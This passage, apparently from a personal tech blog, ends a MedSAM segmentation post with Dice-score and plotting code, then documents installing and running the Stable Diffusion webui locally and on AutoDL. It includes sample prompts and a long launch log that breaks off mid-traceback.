    bbox_raw=array([164, 159, 189, 187], dtype=int64) -> bbox=array([[656, 636, 756, 748]], dtype=int64)
(256, 256)

(The printed boxes check out: the slice is 256×256, so apply_boxes scales every coordinate by 1024/256 = 4; the mask decoder's raw output is a 256×256 low-resolution mask, which here happens to match the original image size.)

Compute the accuracy

The result shows that this whole operation really is something!

    ori_sam_dsc = compute_dice_coefficient(gt_data>0, ori_sam_seg>0)
    medsam_dsc = compute_dice_coefficient(gt_data>0, medsam_seg>0)
    print('Original SAM DSC: {:.4f}'.format(ori_sam_dsc), 'MedSAM DSC: {:.4f}'.format(medsam_dsc))
    Original SAM DSC: 0.7397 MedSAM DSC: 0.9145
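For reference, compute_dice_coefficient here comes from MedSAM's SurfaceDice utilities. As a minimal sketch (my own paraphrase, assuming binary NumPy masks like the gt_data>0 and medsam_seg>0 passed above), the quantity it computes is:

def dice_coefficient(mask_gt, mask_pred):
    # DSC = 2 * |A ∩ B| / (|A| + |B|); undefined when both masks are empty
    volume_sum = mask_gt.sum() + mask_pred.sum()
    if volume_sum == 0:
        return float('nan')
    volume_intersect = (mask_gt & mask_pred).sum()
    return 2 * volume_intersect / volume_sum

A DSC of 1 means prediction and ground truth overlap perfectly, so the jump from 0.74 to 0.91 is a substantial improvement.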

    visualization functions

# visualization functions
# source: https://github.com/facebookresearch/segment-anything/blob/main/notebooks/predictor_example.ipynb
# change color to avoid red and green
def show_mask(mask, ax, random_color=False):
    if random_color:
        color = np.concatenate([np.random.random(3), np.array([0.6])], axis=0)
    else:
        color = np.array([251/255, 252/255, 30/255, 0.6])
    h, w = mask.shape[-2:]
    mask_image = mask.reshape(h, w, 1) * color.reshape(1, 1, -1)
    ax.imshow(mask_image)

def show_box(box, ax):
    x0, y0 = box[0], box[1]
    w, h = box[2] - box[0], box[3] - box[1]
    ax.add_patch(plt.Rectangle((x0, y0), w, h, edgecolor='blue', facecolor=(0, 0, 0, 0), lw=2))

_, axs = plt.subplots(1, 3, figsize=(25, 25))
axs[0].imshow(image_data)
show_mask(gt_data > 0, axs[0])
# show_box(box_np[img_id], axs[0])
# axs[0].set_title('Mask with Tuned Model', fontsize=20)
axs[0].axis('off')

axs[1].imshow(image_data)
show_mask(ori_sam_seg, axs[1])
show_box(bbox_raw, axs[1])
# add text to image to show dice score
axs[1].text(0.5, 0.5, 'SAM DSC: {:.4f}'.format(ori_sam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
# axs[1].set_title('Mask with Untuned Model', fontsize=20)
axs[1].axis('off')

axs[2].imshow(image_data)
show_mask(medsam_seg, axs[2])
show_box(bbox_raw, axs[2])
# add text to image to show dice score
axs[2].text(0.5, 0.5, 'MedSAM DSC: {:.4f}'.format(medsam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
# axs[2].set_title('Ground Truth', fontsize=20)
axs[2].axis('off')
plt.subplots_adjust(wspace=0.01, hspace=0)  # tighten spacing before rendering
plt.show()
# save plot
# plt.savefig(join(model_save_path, test_npzs[npz_idx].split('.npz')[0] + str(img_id).zfill(3) + '.png'), bbox_inches='tight', dpi=300)
plt.close()

    png

    ]]>
@@ -7111,7 +7111,7 @@ /posts/Software-Stable%20Diffusion/ - Components
    • Git

    • Python

    • AUTOMATIC1111

• Stable Diffusion models

  • Base models

    • The most important change in Stable Diffusion 2 was swapping out the text encoder. Stable Diffusion 1 used OpenAI's CLIP, an open-source model that learns how well a caption describes an image. While the model itself is open source, the dataset CLIP was trained on is, crucially, not publicly available.
      Stable Diffusion 2 switched to OpenCLIP, an open-source counterpart of CLIP trained on a known dataset: an aesthetic subset of LAION-5B, filtered to remove NSFW images. Stability AI says OpenCLIP "drastically improves the quality of generated images" and in fact outperforms the unreleased versions of CLIP on their metrics. (So it is normal for 2 to sometimes look worse than 1.)
    • huggingface
  • Pre-trained models (fine-tuned on top of a base model; they can generate characters in a specific style)

    png

Models come in two formats, ckpt and safetensors:

• ckpt is the older format; it embeds some Python scripts, which makes it vulnerable to malicious payloads

• safetensors is newer and also loads faster (see the sketch below)
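To make the risk concrete, here is a small illustration (my own sketch, assuming the safetensors package is installed; the file names are placeholders): loading a .ckpt goes through Python's pickle machinery, which can execute arbitrary code embedded in the file, while safetensors only ever parses raw tensor data.

import torch
from safetensors.torch import load_file

# safe: safetensors parses a fixed binary layout and never executes code
state_dict = load_file("model.safetensors")

# risky: torch.load unpickles the file, so a malicious .ckpt can run code at load time
state_dict = torch.load("model.ckpt", map_location="cpu")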

Installation

Clone the repository

    AUTOMATIC1111/stable-diffusion-webui: Stable Diffusion web UI (github.com)

    git clone https://github.com/AUTOMATIC1111/stable-diffusion-webui

Download a model

Using 1.5 as an example: runwayml/stable-diffusion-v1-5 at main (huggingface.co)

    png

Put the downloaded model into the repository's models/Stable-diffusion directory:

    png

Install conda

    conda create -n stable-diffusion python=3.10
    conda activate stable-diffusion
    where python
    C:\Users\19048\.conda\envs\stable-diffusion\python.exe
    C:\ProgramData\anaconda3\python.exe
    C:\Users\19048\AppData\Local\Microsoft\WindowsApps\python.exe

Set the parameters in webui-user.bat at the repository root:

    # git pull
    @echo off

    set PYTHON="C:\Users\19048\.conda\envs\stable-diffusion\python.exe"
    set GIT=
    set VENV_DIR=
    set COMMANDLINE_ARGS=

    call webui.bat
• git pull makes the project pull the latest version of the repository before every run; I left it unset
• set PYTHON="C:\Users\19048\.conda\envs\stable-diffusion\python.exe" sets the location of the Python interpreter (COMMANDLINE_ARGS, covered just below, takes the launch flags)
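COMMANDLINE_ARGS is where webui launch flags go. A hedged example (these are real AUTOMATIC1111 flags, but the combination below is only an illustration, not the configuration used in this post):

set COMMANDLINE_ARGS=--medvram --port 7861 --autolaunch

--medvram trades speed for lower VRAM usage, --port changes the listen port, and --autolaunch opens the browser once the UI is up.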

Run the webui

    webui-user.bat
    venv "D:\Study\1st-year-master\Code\StableDiffusion\stable-diffusion-webui\venv\Scripts\Python.exe"
    Python 3.10.9 | packaged by Anaconda, Inc. | (main, Mar 1 2023, 18:18:15) [MSC v.1916 64 bit (AMD64)]
    Commit hash: 22bcc7be428c94e9408f589966c2040187245d81
    Installing torch and torchvision
    Looking in indexes: https://pypi.org/simple, https://download.pytorch.org/whl/cu117
    Collecting torch==1.13.1+cu117
    Downloading https://download.pytorch.org/whl/cu117/torch-1.13.1%2Bcu117-cp310-cp310-win_amd64.whl (2255.4 MB)
    ━╸━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 0.1/2.3 GB 2.2 MB/s eta 0:16:38

I tried to skip this torch installation step because it felt slow, but I couldn't figure out how 😅... Although with the proxy turned off it was actually pretty fast? Hebei University's network speed deserves some credit.

The download kept dying halfway through with:

pip._vendor.urllib3.exceptions.ReadTimeoutError: HTTPSConnectionPool(host='download.pytorch.org', port=443): Read timed out.

Ugh. And the Tsinghua mirror hands you the CPU build of PyTorch, so all I could do was keep retrying. Maddening.
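One workaround (my own suggestion, not something I did in this run): install the CUDA wheels directly from the official PyTorch index, so a generic mirror can never substitute the CPU build:

pip install torch==1.13.1+cu117 torchvision==0.14.1+cu117 --extra-index-url https://download.pytorch.org/whl/cu117

The ==1.13.1+cu117 pin matches what the webui log above was trying to fetch; torchvision 0.14.1 is the matching release.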

It still failed once it got to gfpgan... lunch first.


Okay, stop, stop! Let's just grab an all-in-one installer package off the internet 😅.

If the page errors with Something went wrong Expecting value: line 1 column 1 (char 0), turn off your proxy.

Trying to enable xFormers also throws an error; fine, off it goes.

    png

Some example prompts:

I won't post the really unhinged ones, ahem...

• cubistic painting of Samuel Beckett by Picasso and Georges Braque, analytical cubism, brushstrokes

![png](cubistic painting of Samuel Beckett by Picasso and Georges Braque, analytical cubism, brushstrokes.png)

• photo of rihanna. latex. artgerm, ilya kuvshinov, alphonse mucha. highly detailed 8 k. intricate. nikon d 8 5 0 5 5 mm. award wi

![png](photo of rihanna. latex. artgerm, ilya kuvshinov, alphonse mucha. highly detailed 8 k. intricate. nikon d 8 5 0 5 5 mm. award wi.png)

• junji ito style homer simpson, intricate, highly detailed, illustration, art by junji ito, junji ito

![png](junji ito style homer simpson, intricate, highly detailed, illustration, art by junji ito, junji ito.png)

• Audrey Hepburn painting by Van Gogh

![png](Audrey Hepburn painting by Van Gogh.png)

• realistic extremely detailed portrait painting of a beautiful black woman with a robot, city street on background by Jean Delvil

![png](realistic extremely detailed portrait painting of a beautiful black woman with a robot, city street on background by Jean Delvil.png)

• Michael Jackson painting by Pegaso

![png](Michael Jackson painting by Pegaso.png)

• a really suspicious horse, you can just tell that it’s up to no good

![png](a really suspicious horse, you can just tell that it’s up to no good.png)

Online deployment

Colab

• Local runs are heavy on hardware
• Local deployment is complicated
• Accessible from anywhere
• Free

Colab deployment: camenduru/stable-diffusion-webui-colab at drive (github.com)

AutoDL

webp

Rent a 2080.

webp

Select v15.9 here.

    发现你是第一次运行, 正在初始化镜像依赖
    mkdir: cannot create directory ‘/root/.cache’: File exists
    移动完成
    正在自动下载模型:
    正在下载第1个文件, 总共有1个文件
    >>> download to /root/autodl-tmp/models/checkpoint/xiaolxl/stable-diffusion-models/Anything-ink.safetensors
    downloading file [stable-diffusion-models/Anything-ink.safetensors]
    downloading... 100% 2.0 GiB/2.0 GiBiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/checkpoint/Anything-ink.safetensors
    模型下载完成
    正在自动下载vae:
    正在下载第1个文件, 总共有3个文件
    >>> download to /root/autodl-tmp/models/vae/xiaolxl/stable-diffusion-vaes/model.vae.pt
    downloading file [stable-diffusion-vaes/model.vae.pt]
    downloading... 100% 785 MiB/785 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/vae/model.vae.pt
    正在下载第2个文件, 总共有3个文件
    >>> download to /root/autodl-tmp/models/vae/xiaolxl/stable-diffusion-vaes/sdxl_vae.safetensors
    downloading file [stable-diffusion-vaes/sdxl_vae.safetensors]
    downloading... 100% 319 MiB/319 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/vae/sdxl_vae.safetensors
    正在下载第3个文件, 总共有3个文件
    >>> download to /root/autodl-tmp/models/vae/xiaolxl/stable-diffusion-vaes/vae-ft-mse-840000-ema-pruned.safetensors
    downloading file [stable-diffusion-vaes/vae-ft-mse-840000-ema-pruned.safetensors]
    downloading... 100% 319 MiB/319 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/vae/vae-ft-mse-840000-ema-pruned.safetensors
    vae下载完成
    正在自动下载核心依赖:
    正在下载第1个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/ESRGAN/xiaolxl/sdwebui_core/ESRGAN_4x.pth
    downloading file [sdwebui_core/ESRGAN_4x.pth]
    downloading... 100% 64 MiB/64 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/ESRGAN/ESRGAN_4x.pth
    正在下载第2个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/GFPGAN/xiaolxl/sdwebui_core/detection_Resnet50_Final.pth
    downloading file [sdwebui_core/detection_Resnet50_Final.pth]
    downloading... 100% 104 MiB/104 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/GFPGAN/detection_Resnet50_Final.pth
    正在下载第3个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/GFPGAN/xiaolxl/sdwebui_core/parsing_bisenet.pth
    downloading file [sdwebui_core/parsing_bisenet.pth]
    downloading... 100% 51 MiB/51 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/GFPGAN/parsing_bisenet.pth
    正在下载第4个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/GFPGAN/xiaolxl/sdwebui_core/parsing_parsenet.pth
    downloading file [sdwebui_core/parsing_parsenet.pth]
    downloading... 100% 81 MiB/81 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/GFPGAN/parsing_parsenet.pth
    正在下载第5个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/LDSR/xiaolxl/sdwebui_core/model.ckpt
    downloading file [sdwebui_core/model.ckpt]
    downloading... 100% 1.9 GiB/1.9 GiBiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/LDSR/model.ckpt
    正在下载第6个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/LDSR/xiaolxl/sdwebui_core/project.yaml
    downloading file [sdwebui_core/project.yaml]
    downloading... 100% 1.9 KiB/1.9 KiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/LDSR/project.yaml
    正在下载第7个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/RealESRGAN/xiaolxl/sdwebui_core/RealESRGAN_x4plus.pth
    downloading file [sdwebui_core/RealESRGAN_x4plus.pth]
    downloading... 100% 64 MiB/64 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/RealESRGAN/RealESRGAN_x4plus.pth
    正在下载第8个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/RealESRGAN/xiaolxl/sdwebui_core/RealESRGAN_x4plus_anime_6B.pth
    downloading file [sdwebui_core/RealESRGAN_x4plus_anime_6B.pth]
    downloading... 100% 17 MiB/17 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/RealESRGAN/RealESRGAN_x4plus_anime_6B.pth
    正在下载第9个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/ScuNET/xiaolxl/sdwebui_core/ScuNET.pth
    downloading file [sdwebui_core/ScuNET.pth]
    downloading... 100% 69 MiB/69 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/ScuNET/ScuNET.pth
    正在下载第10个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/SwinIR/xiaolxl/sdwebui_core/SwinIR_4x.pth
    downloading file [sdwebui_core/SwinIR_4x.pth]
    downloading... 100% 136 MiB/136 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/SwinIR/SwinIR_4x.pth
    正在下载第11个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/Codeformer/xiaolxl/sdwebui_core/codeformer-v0.1.0.pth
    downloading file [sdwebui_core/codeformer-v0.1.0.pth]
    downloading... 100% 359 MiB/359 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/Codeformer/codeformer-v0.1.0.pth
    核心依赖下载完成
    Python 3.10.6 (main, Oct 24 2022, 16:07:47) [GCC 11.2.0]
    Version: v1.10.1
    Commit hash: 82a973c04367123ae98bd9abdf80d9eda9b910e2
    Launching Web UI with arguments: --ckpt-dir /root/autodl-tmp/models/checkpoint --embeddings-dir /root/autodl-tmp/models/embeddings --hypernetwork-dir /root/autodl-tmp/models/hypernetwork --lora-dir /root/autodl-tmp/models/lora --vae-dir /root/autodl-tmp/models/vae --controlnet-dir /root/autodl-tmp/models/controlnet --controlnet-annotator-models-path /root/autodl-tmp/models/controlnet_annotator --dreambooth-models-path=/root/autodl-tmp/models/dreambooth --codeformer-models-path /root/autodl-tmp/models/Codeformer --gfpgan-models-path /root/autodl-tmp/models/GFPGAN --esrgan-models-path /root/autodl-tmp/models/ESRGAN --bsrgan-models-path /root/autodl-tmp/models/BSRGAN --realesrgan-models-path /root/autodl-tmp/models/RealESRGAN --scunet-models-path /root/autodl-tmp/models/ScuNET --swinir-models-path /root/autodl-tmp/models/SwinIR --ldsr-models-path /root/autodl-tmp/models/LDSR --port=6006 --skip-install --xformers --disable-safe-unpickle --enable-insecure-extension-access --no-half-vae --disable-nan-check --max-batch-count=16
    2024-11-22 10:09:33.031050: I tensorflow/core/util/port.cc:113] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.
    2024-11-22 10:09:33.031761: I external/local_tsl/tsl/cuda/cudart_stub.cc:32] Could not find cuda drivers on your machine, GPU will not be used.
    2024-11-22 10:09:33.036407: I external/local_tsl/tsl/cuda/cudart_stub.cc:32] Could not find cuda drivers on your machine, GPU will not be used.
    2024-11-22 10:09:33.096722: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
    To enable the following instructions: AVX2 AVX512F AVX512_VNNI FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
    2024-11-22 10:09:34.162360: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
    [2024-11-22 10:09:37,570][DEBUG][git.cmd] - Popen(['git', 'version'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:09:37,573][DEBUG][git.cmd] - Popen(['git', 'version'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    ==============================================================================
    You are running torch 2.0.1+cu118.
    The program is tested to work with torch 2.1.2.
    To reinstall the desired version, run with commandline flag --reinstall-torch.
    Beware that this will cause a lot of large files to be downloaded, as well as
    there are reports of issues with training tab on the latest version.

    Use --skip-version-check commandline argument to disable this check.
    ==============================================================================
    =================================================================================
    You are running xformers 0.0.22.
    The program is tested to work with xformers 0.0.23.post1.
    To reinstall the desired version, run with commandline flag --reinstall-xformers.

    Use --skip-version-check commandline argument to disable this check.
    =================================================================================
    Tag Autocomplete: Could not locate model-keyword extension, Lora trigger word completion will be limited to those added through the extra networks menu.
    [2024-11-22 10:09:39,928][DEBUG][filelock] - Attempting to acquire lock 140561340305072 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
    [2024-11-22 10:09:39,928][DEBUG][filelock] - Lock 140561340305072 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
    [2024-11-22 10:09:39,934][DEBUG][filelock] - Attempting to acquire lock 140561340307616 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
    [2024-11-22 10:09:39,934][DEBUG][filelock] - Lock 140561340307616 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
    [2024-11-22 10:09:39,978][DEBUG][filelock] - Attempting to acquire lock 140561342047728 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
    [2024-11-22 10:09:39,978][DEBUG][filelock] - Lock 140561342047728 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
    [2024-11-22 10:09:39,989][DEBUG][filelock] - Attempting to acquire lock 140561340302624 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:39,989][DEBUG][filelock] - Lock 140561340302624 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:39,995][DEBUG][filelock] - Attempting to acquire lock 140561340312128 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    [2024-11-22 10:09:39,995][DEBUG][filelock] - Lock 140561340312128 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    hand_yolov8n.pt: 0%| | 0.00/6.24M [00:00<?, ?B/s]
    person_yolov8n-seg.pt: 0%| | 0.00/6.78M [00:00<?, ?B/s]

    person_yolov8s-seg.pt: 0%| | 0.00/23.9M [00:00<?, ?B/s]


    face_yolov8n.pt: 0%| | 0.00/6.23M [00:00<?, ?B/s]



    hand_yolov8n.pt: 100%|█████████████████████| 6.24M/6.24M [00:01<00:00, 6.23MB/s]
    [2024-11-22 10:09:41,420][DEBUG][filelock] - Attempting to release lock 140561340305072 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
    [2024-11-22 10:09:41,420][DEBUG][filelock] - Lock 140561340305072 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock

    person_yolov8n-seg.pt: 100%|███████████████| 6.78M/6.78M [00:01<00:00, 5.19MB/s]
    [2024-11-22 10:09:41,779][DEBUG][filelock] - Attempting to release lock 140561340307616 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
    [2024-11-22 10:09:41,780][DEBUG][filelock] - Lock 140561340307616 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock



    face_yolov8n.pt: 100%|█████████████████████| 6.23M/6.23M [00:01<00:00, 4.71MB/s]
    [2024-11-22 10:09:41,860][DEBUG][filelock] - Attempting to release lock 140561342047728 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
    [2024-11-22 10:09:41,860][DEBUG][filelock] - Lock 140561342047728 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock


    person_yolov8s-seg.pt: 44%|██████▌ | 10.5M/23.9M [00:01<00:01, 7.20MB/s]



    face_yolov8s.pt: 47%|█████████▊ | 10.5M/22.5M [00:01<00:02, 5.43MB/s]

    person_yolov8s-seg.pt: 88%|█████████████▏ | 21.0M/23.9M [00:02<00:00, 8.41MB/s]

    person_yolov8s-seg.pt: 100%|███████████████| 23.9M/23.9M [00:02<00:00, 8.63MB/s]
    [2024-11-22 10:09:43,256][DEBUG][filelock] - Attempting to release lock 140561340312128 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    [2024-11-22 10:09:43,256][DEBUG][filelock] - Lock 140561340312128 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock




    face_yolov8s.pt: 93%|███████████████████▌ | 21.0M/22.5M [00:02<00:00, 7.86MB/s]



    face_yolov8s.pt: 100%|█████████████████████| 22.5M/22.5M [00:02<00:00, 7.52MB/s]
    [2024-11-22 10:09:43,628][DEBUG][filelock] - Attempting to release lock 140561340302624 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:43,628][DEBUG][filelock] - Lock 140561340302624 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [-] ADetailer initialized. version: 24.9.0, num models: 10
    Using sqlite file: /root/stable-diffusion-webui/extensions/sd-webui-agent-scheduler/task_scheduler.sqlite3
    ControlNet preprocessor location: /root/autodl-tmp/models/controlnet_annotator
    2024-11-22 10:09:46,370 - ControlNet - INFO - ControlNet v1.1.455
    Please 'pip install apex'
    [sd-webui-freeu] Controlnet support: *enabled*
    sd-webui-prompt-all-in-one background API service started successfully.
    2024-11-22 10:09:47,532 - roop - INFO - roop v0.0.2
    2024-11-22 10:09:47,627 - roop - INFO - roop v0.0.2
    [2024-11-22 10:09:48,591][DEBUG][api.py] - API flag not enabled, skipping API layer. Please enable with --api
    == WD14 tagger /gpu:0, uname_result(system='Linux', node='autodl-container-2cce11be52-d05bc5cf', release='5.4.0-182-generic', version='#202-Ubuntu SMP Fri Apr 26 12:29:36 UTC 2024', machine='x86_64') ==
    Checkpoint Anything-ink.safetensors [a1535d0a42] not found; loading fallback Anything-ink.safetensors
    Calculating sha256 for /root/stable-diffusion-webui/models/Stable-diffusion/Anything-ink.safetensors: 2024-11-22 10:09:50,529 - ControlNet - INFO - ControlNet UI callback registered.
    LightDiffusionFlow 绑定完成
    *Deforum ControlNet support: enabled*
    [tag-editor] Custom taggers loaded: ['Improved Aesthetic Predictor', 'cafeai aesthetic classifier', 'aesthetic shadow', 'wd aesthetic classifier']
    Running on local URL: http://127.0.0.1:6006
    [2024-11-22 10:09:53,176][DEBUG][botocore.hooks] - Changing event name from creating-client-class.iot-data to creating-client-class.iot-data-plane
    [2024-11-22 10:09:53,178][DEBUG][botocore.hooks] - Changing event name from before-call.apigateway to before-call.api-gateway
    [2024-11-22 10:09:53,178][DEBUG][botocore.hooks] - Changing event name from request-created.machinelearning.Predict to request-created.machine-learning.Predict
    [2024-11-22 10:09:53,179][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.autoscaling.CreateLaunchConfiguration to before-parameter-build.auto-scaling.CreateLaunchConfiguration
    [2024-11-22 10:09:53,180][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.route53 to before-parameter-build.route-53
    [2024-11-22 10:09:53,180][DEBUG][botocore.hooks] - Changing event name from request-created.cloudsearchdomain.Search to request-created.cloudsearch-domain.Search
    [2024-11-22 10:09:53,181][DEBUG][botocore.hooks] - Changing event name from docs.*.autoscaling.CreateLaunchConfiguration.complete-section to docs.*.auto-scaling.CreateLaunchConfiguration.complete-section
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.logs.CreateExportTask to before-parameter-build.cloudwatch-logs.CreateExportTask
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from docs.*.logs.CreateExportTask.complete-section to docs.*.cloudwatch-logs.CreateExportTask.complete-section
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.cloudsearchdomain.Search to before-parameter-build.cloudsearch-domain.Search
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from docs.*.cloudsearchdomain.Search.complete-section to docs.*.cloudsearch-domain.Search.complete-section
    [2024-11-22 10:09:53,185][DEBUG][botocore.utils] - IMDS ENDPOINT: http://169.254.169.254/
    [2024-11-22 10:09:53,186][DEBUG][botocore.credentials] - Looking for credentials via: env
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: assume-role
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: assume-role-with-web-identity
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: sso
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: shared-credentials-file
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: custom-process
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: config-file
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: ec2-credentials-file
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: boto-config
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: container-role
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: iam-role
    [2024-11-22 10:09:54,190][DEBUG][botocore.utils] - Caught retryable HTTP exception while making metadata service request to http://169.254.169.254/latest/api/token: Connect timeout on endpoint URL: "http://169.254.169.254/latest/api/token"
    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 174, in _new_conn
    conn = connection.create_connection(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 95, in create_connection
    raise err
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 85, in create_connection
    sock.connect(sa)
    TimeoutError: timed out

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 465, in send
    urllib_response = conn.urlopen(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 787, in urlopen
    retries = retries.increment(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/retry.py", line 525, in increment
    raise six.reraise(type(error), error, _stacktrace)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/packages/six.py", line 770, in reraise
    raise value
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 703, in urlopen
    httplib_response = self._make_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 398, in _make_request
    conn.request(method, url, **httplib_request_kw)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 239, in request
    super(HTTPConnection, self).request(method, url, body=body, headers=headers)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1282, in request
    self._send_request(method, url, body, headers, encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 94, in _send_request
    rval = super()._send_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1328, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1277, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
